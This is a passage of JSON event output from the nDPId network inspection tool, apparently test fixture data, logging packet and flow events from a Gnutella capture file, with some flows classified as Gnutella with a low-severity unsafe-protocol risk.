+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":74093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74093,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0NVxAAIAG3h8KAAIPXxF8KMQkGnhkTfi6AAAAAIAC+vBRMgAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":74093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74093,"pkt":"UlQAEjUCCAAn5uVZCABFAAA02YJAAIAG1DcKAAIPcfzO\/sQhwbNg4z+5AAAAAIAC+vAApAAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":74108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74108,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0\/F1AAIAGA80KAAIPJOnJocRQC0aEhFh7AAAAAIAC+vDM7wAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":74217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74217,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Dd5AAIAGwQMKAAIPQh7dtcRHyWh8xjFMAAAAAIAC+vAMegAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":74218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74218,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0IwxAAIAGfuEKAAIPUAf8wMRGsnV8RDFlAAAAAIAC+vD24gAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":74218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74218,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0c0NAAIAGin0KAAIPvD00t8RE+erRmdziAAAAAIAC+vAKcAAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":74218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74218,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0I3RAAIAGoE0KAAIPST7htcRFtvuqIJp6AAAAAIAC+vB9QAAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":74327,"flow_last_seen":74327,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":74327,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":74327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74327,"pkt":"UlQAEjUCCAAn5uVZCABFAAA04otAAIAG+gUKAAIPt7NacMRTJnw0vRokAAAAAIAC+vAcPAAAAgQFtAEDAwgBAQQC"} +00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":74328,"flow_last_seen":74328,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":74328,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.200.161","src_port":50260,"dst_port":51394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":74328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74328,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xdJAAIAG7kEKAAIPcf\/IocRUyMI6N6PeAAAAAIAC+vDCQgAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":74328,"flow_last_seen":74328,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":74328,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":74328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74328,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZARAAIAGxHUKAAIPnDkqAsRVgsQy7nYLAAAAAIAC+vCxwQAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":74329,"flow_last_seen":74329,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":74329,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":74329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74329,"pkt":"UlQAEjUCCAAn5uVZCABFAAA07XNAAIAG0w0KAAIPUD3d9sRWd3H5FzmMAAAAAIAC+vDLcAAAAgQFtAEDAwgBAQQC"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":74362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":74362,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAuYAAEAGPaRQPd32CgACD3dxxFYAg9YB+Rc5jWAS\/\/8Y4gAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":74362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":74362,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo7XRAAIAG0xgKAAIPUD3d9sRWd3H5FzmNAIPWAlAQ+vA1rgAA"} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74329,"flow_last_seen":74362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":74362,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":74510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":74510,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAuwAAEAGWa63s1pwCgACDyZ8xFMAhNABNL0aJWAS\/\/9vrAAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":3,"flow_last_seen":74510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":74510,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo4oxAAIAG+hAKAAIPt7NacMRTJnw0vRolAITQAlAQ+vCMeAAA"} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74327,"flow_last_seen":74511,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":74511,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZdtAAIAGUVoKAAIPtpuA5MQoDLg79XydAAAAAIAC+vCnHQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FTlAAIAG3SgKAAIPUMGrksQm0jCYt6bIAAAAAIAC+vCV5QAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0d8RAAIAGrlIKAAIPcfxWosQp1q4KULlcAAAAAIAC+vBA7QAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0EVBAAIAGi58KAAIPWmf3XsQq5qXgntCpAAAAAIAC+vC6MQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Co5AAIAGJkYKAAIPfPRA7cQnEmB1c07JAAAAAIAC+vAPawAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":75108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75108,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gZBAAIAGBp8KAAIPwXmlDMQr2FBBRhZnAAAAAIAC+vANYQAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":75264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75264,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gnNAAIAGzTcKAAIPGE6GvMROv5bJBoRLAAAAAIAC+vD3zgAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":75280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75280,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0cvhAAIAGYVMKAAIPGH8B68RLk7Zj+37vAAAAAIAC+vASugAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":75358,"flow_last_seen":75358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":75358,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.182.136.42","src_port":50263,"dst_port":27873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":75358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75358,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xOZAAIAGV+4KAAIPSbaIKsRXbOGIdOVZAAAAAIAC+vD3KAAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":75358,"flow_last_seen":75358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":75358,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50264,"dst_port":48380,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":75358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75358,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GYdAAIAGqOAKAAIPXwrNQ8RYvPy3IUp\/AAAAAIAC+vC4zAAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":75359,"flow_last_seen":75359,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":75359,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.250.32","src_port":50265,"dst_port":52647,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":75359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75359,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bsVAAIAGE9AKAAIPcf\/6IMRZzacG03PuAAAAAIAC+vDvLQAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":75359,"flow_last_seen":75359,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":75359,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.175.103","src_port":50266,"dst_port":4315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":75359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75359,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DLlAAIAGV04KAAIP20avZ8RaENsT5fMFAAAAAIAC+vABQgAAAgQFtAEDAwgBAQQC"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":75482,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":75482,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAvIAAEAGpZCcOSoCCgACD4LExFUAh74BMu52DGAS\/\/8XLwAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":75482,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":75482,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoZAVAAIAGxIAKAAIPnDkqAsRVgsQy7nYMAIe+AlAQ+vAz+wAA"} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74328,"flow_last_seen":75501,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":75501,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":75731,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":75731,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAvQAAP8GIh\/bRq9nCgACDxDbxFoAAAAAE+XzBlAUAAA88gAA"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UtJAAIAGDgUKAAIPTn0\/YcQwGMq9KdLlAAAAAIAC+vBtKAAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0R05AAIAGN+MKAAIPdqf43MQv9oQzn2SqAAAAAIAC+vCljgAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0faNAAIAGiKQKAAIPO2itBcQtwyRMUgplAAAAAIAC+vChmQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+zhAAIAGNBcKAAIPbdJRk8QxYOCX52ZFAAAAAIAC+vCFbAAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":76233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76233,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DLpAAIAGV00KAAIP20avZ8RaENsT5fMFAAAAAIAC+vABQgAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":76326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76326,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+G1AAIAG6ukKAAIP20YwF8RRC+6AEyaiAAAAAIAC+vDlvQAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":76326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76326,"pkt":"UlQAEjUCCAAn5uVZCABFAAA00EJAAIAGLmEKAAIPJOzLJcRPy8UyAvKaAAAAAIAC+vDDTAAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":76326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76326,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0hYdAAIAGFfcKAAIPemTY0sRSG7mAD45dAAAAAIAC+vAmYQAAAgQFtAEDAwgBAQQC"} 